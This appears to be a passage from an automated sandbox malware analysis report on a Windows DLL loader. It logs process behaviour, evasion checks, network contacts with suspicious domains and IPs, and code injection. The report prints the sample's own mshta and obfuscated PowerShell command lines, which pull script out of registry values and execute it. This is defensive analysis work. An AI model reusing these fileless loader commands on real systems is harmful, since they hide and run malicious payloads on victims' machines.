            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084Thread sleep time: -1773297476s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084Thread sleep count: 799 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 6259 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep count: 2927 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep count: 6479 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep count: 2798 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 390Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 799Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1425Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 506Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1129Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1555Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 870Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 862Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6259
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2927
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6479
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2798
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1803
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6739
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2705
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWh4[
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-b^u
            Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@
            Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0Jump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3472
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 9B851580
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
